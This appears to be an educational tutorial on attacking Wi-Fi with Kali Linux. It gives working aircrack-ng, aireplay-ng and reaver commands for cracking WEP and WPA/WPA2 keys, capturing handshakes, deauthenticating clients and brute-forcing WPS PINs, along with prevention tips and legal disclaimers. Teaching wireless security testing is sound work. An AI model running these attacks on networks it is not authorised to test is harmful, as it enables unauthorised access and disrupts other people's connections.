Wi-Fi Hacking with Kali Linux

For Educational and Ethical Penetration Testing Only

Chapter 1: Introduction to Wi-Fi Hacking

What is Wi-Fi Hacking?

Wi-Fi hacking refers to the process of exploiting vulnerabilities in wireless networks to gain unauthorized access. Ethical hackers and penetration testers use these techniques to secure networks.

Understanding Wireless Security Protocols

• WEP (Wired Equivalent Privacy) – Weak encryption, easily crack able.
• WPA (Wi-Fi Protected Access) – Stronger than WEP but still vulnerable.
• WPA2 (Wi-Fi Protected Access II) – More secure but susceptible to handshake attacks.
• WPA3 – Latest and most secure, harder to crack.

Legal and Ethical Considerations

"Performing unauthorized hacking is illegal. Only conduct penetration tests on networks you own or have explicit permission to test."

Chapter 2: Setting Up Your Kali Linux Environment

Installing Kali Linux

You can install Kali Linux on a virtual machine or as a primary OS:

• VirtualBox/VMware: Download Kali Linux ISO and install it.
• Bootable USB: Use tools like Rufus to create a bootable USB.
• Full Installation: Dual boot with Windows.

Updating Kali Linux

sudo apt update && sudo apt upgrade -y
        

Installing Required Tools

sudo apt install aircrack-ng reaver wash wireshark dsniff
        

Chapter 3: Understanding Wireless Network Adapters

To perform Wi-Fi penetration testing, you need a wireless adapter that supports monitor mode and packet injection.

Checking Your Adapter

iwconfig
        

If your adapter is listed with wlan0 or wlan1, check if it supports monitor mode:

sudo airmon-ng check kill
sudo airmon-ng start wlan0
        

Chapter 4: Essential Kali Linux Commands for WiFi Hacking

• airmon-ng – Enables monitor mode.
• airodump-ng – Captures network packets.
• aireplay-ng – Injects packets.
• aircrack-ng – Cracks passwords.
• wash – Scans for WPS networks.
• reaver – WPS brute-force attack.

Chapter 5: Cracking WEP Encryption

Capturing Packets

sudo airodump-ng wlan0mon
        

Injecting Packets

sudo aireplay-ng -3 -b <BSSID> -h <MAC> wlan0mon
        

Cracking WEP Key

sudo aircrack-ng -b <BSSID> -w <wordlist.txt> capturefile.cap
        

Chapter 6: Cracking WPA/WPA2 Encryption

Capturing the Handshake

sudo airodump-ng --bssid <BSSID> -c <channel> -w handshake wlan0mon
        

Deauthenticating Clients

sudo aireplay-ng -0 5 -a <BSSID> wlan0mon
        

Cracking with Dictionary Attack

sudo aircrack-ng -w <wordlist.txt> -b <BSSID> handshake.cap
        

Chapter 7: WPS PIN Attack (Reaver Method)

Scanning for WPS Networks

sudo wash -i wlan0mon
        

Brute-forcing WPS PIN

sudo reaver -i wlan0mon -b <BSSID> -vv
        

Chapter 8: MITM Attacks & Deauthentication Attacks

Deauthentication Attack

sudo aireplay-ng -0 10 -a <BSSID> wlan0mon
        

Sniffing Packets with Wireshark

sudo wireshark &
        

Chapter 9: Preventing Wi-Fi Hacking

• Use WPA3 instead of WPA2.
• Disable WPS.
• Regularly change Wi-Fi passwords.
• Use MAC address filtering.
• Enable firewall and intrusion detection systems.

Chapter 10: Final Thoughts & Further Learning

• Learn Certified Ethical Hacking (CEH).
• Practice on Hack The Box.
• Study more about wireless security tools.

Disclaimer: This article is intended for ethical hacking and cybersecurity education only. "Unauthorized hacking is illegal and punishable by law."